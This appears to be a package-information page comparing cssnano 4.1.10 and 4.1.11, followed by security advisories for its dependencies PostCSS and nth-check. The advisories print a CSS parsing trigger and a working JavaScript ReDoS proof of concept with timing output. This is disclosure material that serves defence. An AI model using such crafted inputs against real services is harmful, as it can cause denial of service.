Cssnano is a powerful, modular minifier for CSS code, built upon the PostCSS ecosystem. Versions 4.1.10 and 4.1.11 share the same core functionality, offering developers a robust solution for reducing CSS file sizes and improving website performance. Both versions rely on PostCSS, cosmiconfig, and is-resolvable for core processing and configuration. They also share the 'cssnano-preset-default' dependency, providing a sensible default configuration for minification. Development dependencies like webpack, babel, and related tools remain consistent between the two, suggesting no significant shifts in the development process.
The key difference lies in the release date and a small increase in the unpacked size of the package. Version 4.1.11 was released significantly later, in April 2021, compared to 4.1.10, which was released in February 2019. While the file count remains the same, the unpacked size of version 4.1.11 is slightly larger (29637 bytes vs 29540 bytes). This subtle increase could indicate minor bug fixes, performance enhancements, or updated dependencies within the 'cssnano-preset-default' that are not explicitly listed in the top level 'dependencies'. Developers should consider upgrading to the later version to benefit from any potential improvements and ensure they are using the most up-to-date and reliable version of the library. Always check the changelog and release notes for a comprehensive understanding of the changes.
All the vulnerabilities related to the version 4.1.11 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms